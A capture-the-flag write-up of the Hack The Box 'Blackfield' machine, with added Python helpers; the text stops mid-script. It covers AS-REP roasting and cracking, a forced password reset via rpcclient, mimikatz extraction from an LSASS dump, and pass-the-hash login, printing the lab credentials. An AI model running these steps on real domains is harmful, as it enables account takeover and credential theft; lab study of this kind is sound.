BLACKFIELD HACKTHEBOX

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 19:13 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 19:13
    Completed NSE at 19:13, 0.00s elapsed
    Initiating NSE at 19:13
    Completed NSE at 19:13, 0.00s elapsed
    Initiating NSE at 19:13
    Completed NSE at 19:13, 0.00s elapsed
    Initiating Ping Scan at 19:13
    Scanning 10.10.10.192 [4 ports]
    Completed Ping Scan at 19:13, 0.60s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 19:13
    Scanning blackfield.htb (10.10.10.192) [1000 ports]
    Discovered open port 445/tcp on 10.10.10.192
    Discovered open port 53/tcp on 10.10.10.192
    Discovered open port 139/tcp on 10.10.10.192
    Discovered open port 135/tcp on 10.10.10.192
    Discovered open port 88/tcp on 10.10.10.192
    Discovered open port 593/tcp on 10.10.10.192
    Discovered open port 3268/tcp on 10.10.10.192
    Discovered open port 389/tcp on 10.10.10.192
    Completed SYN Stealth Scan at 19:13, 24.70s elapsed (1000 total ports)
    Initiating Service scan at 19:13
    Scanning 8 services on blackfield.htb (10.10.10.192)
    Completed Service scan at 19:16, 156.27s elapsed (8 services on 1 host)
    Initiating OS detection (try #1) against blackfield.htb (10.10.10.192)
    Retrying OS detection (try #2) against blackfield.htb (10.10.10.192)
    Initiating Traceroute at 19:16
    Completed Traceroute at 19:16, 0.73s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 19:16
    Completed Parallel DNS resolution of 2 hosts. at 19:16, 0.60s elapsed
    NSE: Script scanning 10.10.10.192.
    Initiating NSE at 19:16
    Completed NSE at 19:17, 40.10s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 3.22s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Nmap scan report for blackfield.htb (10.10.10.192)
    Host is up (0.51s latency).
    Not shown: 992 filtered ports
    PORT     STATE SERVICE       VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-10 20:49:11Z)
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds?
    593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=7/10%Time=5F0870AA%P=x86_64-pc-linux-gnu%r(DNSV
    SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
    SF:x04bind\0\0\x10\0\x03");
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
    No OS matches for host
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=260 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 7h05m04s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-07-10T20:51:52
    |_  start_date: N/A

    TRACEROUTE (using port 445/tcp)
    HOP RTT       ADDRESS
    1   721.31 ms 10.10.14.1
    2   721.43 ms blackfield.htb (10.10.10.192)

    NSE: Script Post-scanning.
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 235.29 seconds
            Raw packets sent: 2093 (95.776KB) | Rcvd: 111 (7.997KB)

PORT ENUMERATION

PORT 445

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #smbclient -L 10.10.10.192
    Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
        z               Disk      
    SMB1 disabled -- no workgroup available

The share listing worked without credentials (anonymous session), so the profiles$ share is next:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #smbclient \\\\10.10.10.192\\profiles$
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 22:17:12 2020
  ..                                  D        0  Wed Jun  3 22:17:12 2020
  AAlleni                             D        0  Wed Jun  3 22:17:11 2020
  ABarteski                           D        0  Wed Jun  3 22:17:11 2020
  ABekesz                             D        0  Wed Jun  3 22:17:11 2020
  ABenzies                            D        0  Wed Jun  3 22:17:11 2020
  ABiemiller                          D        0  Wed Jun  3 22:17:11 2020
  AChampken                           D        0  Wed Jun  3 22:17:11 2020
  
  <---->

The directory names look like usernames (first initial plus surname), so I turned the listing into a user list. Kerberos pre-authentication checks need candidate usernames, so I ran the list through Impacket's GetNPUsers.py: for each name the KDC either says the principal is unknown, says the account exists but requires pre-auth, or hands back an AS-REP that can be cracked offline (AS-REP roasting).

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #python GetNPUsers.py blackfield.local/ -usersfile user.txt -dc-ip 10.10.10.192 -no-pass
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    <---->

    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    $krb5asrep$23$support@BLACKFIELD.LOCAL:f740efb0de3b25d7772ffa79327a9774$bf66496d2586b4c4e88d093f23ced3da37775a3ac7383f264b94b15615bb2cc4d4135afb6d09846829caac8a5a248193ad2cea818f68b44f62af6ff3e959fd9c33565a61ed7a9da1d03e2ca3f62a0550d884b278c37979425b44d85109caaac4383b7677d08b560013ff2f530cebbffb0adc43c27ad2a0e7d1f826eddd13f7035413514c8047e6994970bbcb97928caa116148dc8ed918bdd60c06ded06ea66af321fe369239bffe5e6d6419e4f44b98c9bec1af1c24bad8a997fecaad188a53a09030ad71b53bb5e15b3555d90e071ae7116357c33be0ccce0aebe459f5435f708fa75792881ce6ac3a7f734ee457e3283fcf60
    [-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

    <---->

Cracking the AS-REP hash with hashcat, mode 18200 (Kerberos 5 AS-REP, etype 23), against rockyou gives support's password:

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #hashcat -m 18200 -a 0 kerbhash ../../THM/Wordlists/rockyou.txt --force --show
    $krb5asrep$23$support@BLACKFIELD.LOCAL:fad1ab0da848d218949d3da5661c74ad$8a5cd1423dab835c437cd8109d3339f511843122c04a914ada392308d3610605603d48350a03e18c5763cd61fecb0ffb4e48eaf3bcd45e059fe3f92071f3cd0549a3c29c2a0c2ea5b4e6f30ed63ab4005029e9496d7b8f376bea3bd65f3086d1e9b36674ed16c33feca721d40f64db3bd0c8cdd46df79849ffef9c481cddd78bd6b9d027b3ad5a68b6f00190d9c3ebe0e63913a087b48991baaded76086368a483c3b4f1658d9fb336648f145780c2f4535707ed6110ee5ff9623330c25680aa17c20dd885d6a4a88d93f98dcc8359fb32a876dc9263be6facc8cb3e44ec1d681e94df3c18b6febfb94ff19a7c8a7a3a0b891b8a:#00^BlackKnight
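The two steps above (building the user list from the profiles$ listing, then reading what the KDC says about each name) are easy to do by hand for a handful of names and tedious for hundreds. The script below is an added example, not code from the original post: it parses an smbclient `dir` listing into usernames, then sorts GetNPUsers.py output into "no such account", "account exists, pre-auth required" and "AS-REP roastable", writing the hashes in the form hashcat -m 18200 expects. It assumes the -usersfile behaviour of Impacket's GetNPUsers.py (one result line per candidate, in file order, with the PRINCIPAL_UNKNOWN line not repeating the name); the sample listing and output are constructed from the lines shown on the page, with the hash shortened and support/svc_backup added to the listing so that every outcome appears.

```python
"""Build a user list from smbclient output and triage GetNPUsers.py results.

Added example, not from the original post.  The per-user answers from the KDC
are a user-enumeration oracle: they reveal which accounts exist before you
hold any credentials, and any $krb5asrep$ line is crackable offline.
"""
import re
from typing import Dict, List

# smbclient prints "  name   ATTRS   size   date"; directories carry a D in the
# attribute column.  Assumes entry names contain no spaces.
def users_from_smbclient_dir(listing: str) -> List[str]:
    users = []
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] in (".", "..") or not re.fullmatch(r"[A-Z]+", parts[1]):
            continue
        if "D" in parts[1]:
            users.append(parts[0])
    return users

# The three kinds of per-user result line GetNPUsers.py -usersfile emits.
ASREP_RE = re.compile(r"^\$krb5asrep\$23\$(?P<user>[^@]+)@(?P<realm>[^:]+):[0-9a-f]+\$[0-9a-f]+$")
NOPREAUTH_RE = re.compile(r"^\[-\] User (?P<user>\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$")
UNKNOWN_RE = re.compile(r"^\[-\] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN")

def triage_getnpusers(output: str, candidates: List[str]) -> Dict[str, List[str]]:
    results = [ln for ln in output.splitlines()
               if ASREP_RE.match(ln) or NOPREAUTH_RE.match(ln) or UNKNOWN_RE.match(ln)]
    users = [u.strip() for u in candidates if u.strip()]
    if len(results) != len(users):
        raise ValueError(f"{len(results)} result lines for {len(users)} candidates: "
                         "output truncated or not produced with -usersfile")
    buckets: Dict[str, List[str]] = {"unknown": [], "exists": [], "roastable": [], "hashes": []}
    for user, line in zip(users, results):
        if UNKNOWN_RE.match(line):
            buckets["unknown"].append(user)           # no such principal in the realm
            continue
        m = NOPREAUTH_RE.match(line) or ASREP_RE.match(line)
        if m["user"].lower() != user.lower():         # sanity-check the file-order assumption
            raise ValueError(f"result for {m['user']} where {user} was expected")
        if NOPREAUTH_RE.match(line):
            buckets["exists"].append(user)            # valid account, pre-auth enforced
        else:
            buckets["roastable"].append(user)
            buckets["hashes"].append(line)            # already in hashcat -m 18200 format
    return buckets

def write_hashcat_file(buckets: Dict[str, List[str]], path: str = "kerbhash") -> str:
    with open(path, "w") as fh:
        fh.write("".join(h + "\n" for h in buckets["hashes"]))
    return path

# Constructed samples, trimmed from the listings on the page (hash shortened).
SAMPLE_DIR = """\
  .                                   D        0  Wed Jun  3 22:17:12 2020
  ..                                  D        0  Wed Jun  3 22:17:12 2020
  AAlleni                             D        0  Wed Jun  3 22:17:11 2020
  ABarteski                           D        0  Wed Jun  3 22:17:11 2020
  support                             D        0  Wed Jun  3 22:17:11 2020
  svc_backup                          D        0  Wed Jun  3 22:17:11 2020
  ABekesz                             D        0  Wed Jun  3 22:17:11 2020

        7846143 blocks of size 4096. 3931591 blocks available
"""
SAMPLE_OUTPUT = """\
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD.LOCAL:f740efb0de3b25d7772ffa79327a9774$bf66496d2586b4c4e88d093f23ced3da
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
"""

if __name__ == "__main__":
    found = triage_getnpusers(SAMPLE_OUTPUT, users_from_smbclient_dir(SAMPLE_DIR))
    print("exist:", found["exists"] + found["roastable"], "| roastable:", found["roastable"])
    print("wrote", write_hashcat_file(found))
```

The "exists" bucket is worth keeping even though it yields no hash: those are confirmed accounts for password spraying later, and the rest of the names can be dropped. The kerbhash file it writes is what the hashcat line above consumes.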

I tried this password against WinRM (evil-winrm), SMB (smbclient) and RPC (rpcclient). It did not work for WinRM, but it worked for SMB and RPC, and rpcclient gave the most useful information:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password: 

rpcclient $> enumdomusers 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
user:[BLACKFIELD553715] rid:[0x457]

<--->

I also ran enumprivs. Be aware that this lists the privileges the LSA on the DC knows about (it reports 35 of them), not the privileges held by the support account, so it says nothing about what support can actually do:

┌─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password: 

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb

<---->

What lets support act here is not one of those privileges but a right on the audit2020 user object that permits resetting its password (the ForceChangePassword / GenericAll kind of ACE that BloodHound surfaces); a friend pointed me at it. The reset is a SAMR SetUserInfo2 call, which rpcclient exposes as setuserinfo2 with information level 23 (UserInternal4Information, which carries the new encrypted password). The technique is described here:

https://malicious.link/post/2017/reset-ad-user-password-with-linux/

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #rpcclient -U support 10.10.10.192
    Enter WORKGROUP\support's password: 
    rpcclient $> setuserinfo2 audit2020 23 'liquid12@@#'
    rpcclient $> 

The new password has to satisfy the domain password policy (minimum length and complexity), otherwise the call is rejected with NT_STATUS_PASSWORD_RESTRICTION. Note that this is a destructive step: audit2020's old password is gone, which on a real engagement needs explicit authorisation. With audit2020's new password we go back to smbclient to reach the other shares. The useful share that audit2020 can read is forensic: its memory_analysis folder holds per-process memory dumps, including lsass.zip, and LSASS memory contains credential material for every logged-on account. So let's get that zip out.
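Because a rejected reset costs a round trip and leaves an event in the DC's logs, it is worth checking a candidate password against the policy locally first. The function below is an added example, not from the original post; it implements Microsoft's documented "Password must meet complexity requirements" rule (no sAMAccountName or display-name tokens of three or more characters, at least three of the five character categories) with the minimum length passed in separately, because that is a different policy setting (7 in the default domain policy). It cannot know about fine-grained password policies or password-filter DLLs on the domain, so a pass here is necessary, not sufficient.

```python
"""Local pre-check of a new password against the default AD complexity rule.

Added example, not code from the original post.  Mirrors the documented
"Password must meet complexity requirements" policy; the minimum length is an
argument because it is a separate setting (7 in the default domain policy).
"""
import re
from typing import List, Tuple

# The display name is split into tokens on these delimiters (commas, periods,
# dashes, underscores, spaces, pound signs, tabs); tokens of 3+ characters must
# not appear in the password.
_DELIMS = re.compile(r"[,.\-_ #\t]+")

def _name_tokens(display_name: str) -> List[str]:
    return [t for t in _DELIMS.split(display_name or "") if len(t) >= 3]

def check_complexity(password: str, sam_account_name: str,
                     display_name: str = "", min_length: int = 7) -> Tuple[bool, List[str]]:
    """Return (ok, reasons).  An empty reasons list means the password should pass."""
    reasons: List[str] = []
    # The complexity rule itself demands at least 6; the domain minimum may be higher.
    effective_min = max(6, min_length)
    if len(password) < effective_min:
        reasons.append(f"shorter than {effective_min} characters")
    lowered = password.lower()
    # The account name check is skipped when the name is shorter than 3 characters.
    if len(sam_account_name) >= 3 and sam_account_name.lower() in lowered:
        reasons.append("contains the sAMAccountName")
    for tok in _name_tokens(display_name):
        if tok.lower() in lowered:
            reasons.append(f"contains display-name token {tok!r}")
    categories = [
        any(c.isupper() for c in password),                       # A-Z
        any(c.islower() for c in password),                       # a-z
        any(c.isdigit() for c in password),                       # 0-9
        any(not c.isalnum() for c in password),                   # punctuation / symbols
        any(c.isalpha() and not c.isupper() and not c.islower()   # caseless scripts
            for c in password),
    ]
    if sum(categories) < 3:
        reasons.append("fewer than three of the five character categories")
    return (not reasons), reasons

if __name__ == "__main__":
    # The password used on the page, checked against the audit2020 account name.
    ok, why = check_complexity("liquid12@@#", "audit2020")
    print("liquid12@@#", "accepted" if ok else why)
    ok, why = check_complexity("Audit2020!!", "audit2020")
    print("Audit2020!!", "accepted" if ok else why)
```

Run it with the password you intend to pass to setuserinfo2; if the reasons list is non-empty, the DC will refuse the reset for at least those reasons.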

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #smbclient -U audit2020 \\\\10.10.10.192\\forensic
    Enter WORKGROUP\audit2020's password: 
    Try "help" to get a list of possible commands.
    smb: \> cd memory_analysis\
    smb: \memory_analysis\> dir
      .                                   D        0  Fri May 29 01:58:33 2020
      ..                                  D        0  Fri May 29 01:58:33 2020
      conhost.zip                         A 37876530  Fri May 29 01:55:36 2020
      ctfmon.zip                          A 24962333  Fri May 29 01:55:45 2020
      dfsrs.zip                           A 23993305  Fri May 29 01:55:54 2020
      dllhost.zip                         A 18366396  Fri May 29 01:56:04 2020
      ismserv.zip                         A  8810157  Fri May 29 01:56:13 2020
      lsass.zip                           A 41936098  Fri May 29 01:55:08 2020
      mmc.zip                             A 64288607  Fri May 29 01:55:25 2020
      RuntimeBroker.zip                   A 13332174  Fri May 29 01:56:24 2020
      ServerManager.zip                   A 131983313  Fri May 29 01:56:49 2020
      sihost.zip                          A 33141744  Fri May 29 01:57:00 2020
      smartscreen.zip                     A 33756344  Fri May 29 01:57:11 2020
      svchost.zip                         A 14408833  Fri May 29 01:57:19 2020
      taskhostw.zip                       A 34631412  Fri May 29 01:57:30 2020
      winlogon.zip                        A 14255089  Fri May 29 01:57:38 2020
      wlms.zip                            A  4067425  Fri May 29 01:57:44 2020
      WmiPrvSE.zip                        A 18303252  Fri May 29 01:57:53 2020

            7846143 blocks of size 4096. 3931591 blocks available
    smb: \memory_analysis\> 

https://ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

Download lsass.zip and extract it; inside is lsass.DMP, a minidump of the LSASS process. Load it into mimikatz on a Windows host (the dump is parsed offline, the DC is never touched) and then list the logon sessions:

    sekurlsa::minidump lsass.DMP
    sekurlsa::logonPasswords

sekurlsa::minidump switches mimikatz from the live LSASS to the dump file, and logonPasswords then prints every logon session it contains, which includes the NT hash of svc_backup. On Linux, pypykatz does the same job: pypykatz lsa minidump lsass.DMP.
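Before spending time on a dump it is useful to confirm it really is a minidump, that it captured full process memory (a dump without memory has no credentials in it) and which Windows build it came from, since mimikatz picks its LSASS structure layouts by OS version. The parser below is an added example, not code from the original post: it reads the documented MINIDUMP_HEADER and MINIDUMP_DIRECTORY layout from dbghelp.h and pulls the OS version out of the SystemInfo stream. The dump bytes it runs on are constructed inside the script (the build number is arbitrary), not taken from the box.

```python
"""Inspect a minidump (the lsass.DMP format) before feeding it to mimikatz.

Added example, not code from the original post.  Parses MINIDUMP_HEADER and
the stream directory, reports the stream types present, whether full process
memory was captured, and the OS version recorded in the SystemInfo stream.
"""
import struct
from typing import Dict, List, Optional, Tuple

MDMP_SIGNATURE = b"MDMP"
HEADER_FMT = "<4sIIIIIQ"   # Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
DIR_FMT = "<III"           # StreamType, Location.DataSize, Location.Rva
MINIDUMP_WITH_FULL_MEMORY = 0x2   # MINIDUMP_TYPE flag set by procdump -ma and Task Manager dumps
STREAM_NAMES = {0: "UnusedStream", 3: "ThreadListStream", 4: "ModuleListStream",
                5: "MemoryListStream", 6: "ExceptionStream", 7: "SystemInfoStream",
                8: "ThreadExListStream", 9: "Memory64ListStream", 12: "HandleDataStream",
                15: "MiscInfoStream", 16: "MemoryInfoListStream", 17: "ThreadInfoListStream",
                19: "TokenStream"}

def parse_minidump(data: bytes) -> Dict:
    sig, _version, nstreams, dir_rva, _csum, timestamp, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("not a minidump: bad signature")
    streams: List[Tuple[str, int, int]] = []
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIR_FMT, data, dir_rva + i * struct.calcsize(DIR_FMT))
        streams.append((STREAM_NAMES.get(stype, f"Stream{stype}"), size, rva))
    os_version: Optional[Tuple[int, int, int]] = None
    for name, size, rva in streams:
        # MINIDUMP_SYSTEM_INFO: MajorVersion, MinorVersion, BuildNumber start at offset 8
        if name == "SystemInfoStream" and size >= 20:
            os_version = struct.unpack_from("<III", data, rva + 8)
    return {"timestamp": timestamp, "flags": flags,
            "full_memory": bool(flags & MINIDUMP_WITH_FULL_MEMORY),
            "streams": [s[0] for s in streams], "os": os_version}

def looks_like_usable_lsass_dump(info: Dict) -> bool:
    """Credentials only reach the dump if process memory was captured, and the
    module list and OS version are what a parser needs to locate lsasrv structures."""
    needed = {"SystemInfoStream", "ModuleListStream", "Memory64ListStream"}
    return info["full_memory"] and needed.issubset(info["streams"])

def build_sample_dump(full_memory: bool = True) -> bytes:
    """Constructed 120-byte minidump: header, three directory entries, one SystemInfo
    stream (x64, 2 CPUs, server, version 10.0.17763).  Not a real LSASS dump."""
    header_size = struct.calcsize(HEADER_FMT)          # 32
    dir_size = 3 * struct.calcsize(DIR_FMT)            # 36
    sysinfo_rva = header_size + dir_size               # 68
    sysinfo = struct.pack("<HHHBB", 9, 6, 0x3A09, 2, 3)   # arch, level, revision, CPUs, ProductType
    sysinfo += struct.pack("<III", 10, 0, 17763)          # MajorVersion, MinorVersion, BuildNumber
    sysinfo += struct.pack("<II", 2, 0)                   # PlatformId, CSDVersionRva
    sysinfo += b"\x00" * 24                               # remaining fields zeroed
    flags = MINIDUMP_WITH_FULL_MEMORY if full_memory else 0
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, 0xA793, 3, header_size, 0, 1590700000, flags)
    directory = struct.pack(DIR_FMT, 7, len(sysinfo), sysinfo_rva)   # SystemInfoStream
    directory += struct.pack(DIR_FMT, 4, 0, 0)                       # ModuleListStream (empty placeholder)
    directory += struct.pack(DIR_FMT, 9, 0, 0)                       # Memory64ListStream (empty placeholder)
    return header + directory + sysinfo

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    info = parse_minidump(data)
    print("OS version:", info["os"], "| full memory:", info["full_memory"])
    print("streams:", ", ".join(info["streams"]))
    print("usable for credential extraction:", looks_like_usable_lsass_dump(info))
```

Run it as `python minidump_check.py lsass.DMP` (the name is arbitrary) against the extracted file; an unexpected OS version is also a hint that the dump came from a different machine than the one you think you are attacking.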

GETTING USER ACCESS

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


        Directory: C:\Users\svc_backup\Desktop


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----        7/10/2020  10:01 AM                tmp
    -ar---        7/10/2020   5:04 AM             34 user.txt

Now let's look for a privilege escalation path, starting with what the token holds:

    *Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

    USER INFORMATION
    ----------------

    User Name             SID
    ===================== ==============================================
    blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


    GROUP INFORMATION
    -----------------

    Group Name                                 Type             SID          Attributes
    ========================================== ================ ============ ==================================================
    Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
    BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
    Mandatory Label\High Mandatory Level       Label            S-1-16-12288


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeBackupPrivilege             Back up files and directories  Enabled
    SeRestorePrivilege            Restore files and directories  Enabled
    SeShutdownPrivilege           Shut down the system           Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


    USER CLAIMS INFORMATION
    -----------------------

    User claims unknown.

    Kerberos support for Dynamic Access Control on this device has been disabled.
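Reading `whoami /all` by eye works on one host; on many it helps to have the dangerous privileges and builtin groups flagged automatically. The script below is an added example, not code from the original post: it parses the privilege table and the group SIDs from `whoami /all` output and maps the well-known escalation primitives (the mapping table is my own summary of standard abuse techniques). The sample input is trimmed from the svc_backup session above; it reports Backup Operators membership and SeBackupPrivilege / SeRestorePrivilege, which is exactly the path used in the next section.

```python
"""Flag privilege-escalation primitives in `whoami /all` output.

Added example, not code from the original post.  The abuse descriptions are a
summary of well-known techniques, not an exhaustive list.
"""
import re
from typing import Dict, List

DANGEROUS_PRIVS = {
    "SeBackupPrivilege": "read any file regardless of its ACL (ntds.dit, SAM/SYSTEM hives, via a shadow copy)",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL (replace service binaries, DLLs)",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant yourself access",
    "SeDebugPrivilege": "open any process (dump LSASS, inject into SYSTEM processes)",
    "SeImpersonatePrivilege": "impersonate client tokens (potato-family SYSTEM escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign primary tokens to processes (potato-family)",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
    "SeManageVolumePrivilege": "raw access to volumes",
    "SeMachineAccountPrivilege": "add computer accounts to the domain (precondition for RBCD-style abuse)",
}
# Builtin aliases whose members can take over the machine (and on a DC, the domain).
PRIVILEGED_ALIASES = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")
BUILTIN_SID = re.compile(r"\b(S-1-5-32-\d+)\b")

def parse_privileges(text: str) -> Dict[str, str]:
    """Privilege name -> 'Enabled'/'Disabled' from the PRIVILEGES INFORMATION table."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        m = PRIV_ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def escalation_paths(text: str) -> List[str]:
    """One finding per line.  A Disabled privilege still counts: it is in the
    token, and the process can re-enable it with AdjustTokenPrivileges."""
    findings = []
    for sid in BUILTIN_SID.findall(text):
        if sid in PRIVILEGED_ALIASES:
            findings.append(f"member of BUILTIN\\{PRIVILEGED_ALIASES[sid]} ({sid})")
    for priv, state in parse_privileges(text).items():
        if priv in DANGEROUS_PRIVS:
            findings.append(f"{priv} [{state}]: {DANGEROUS_PRIVS[priv]}")
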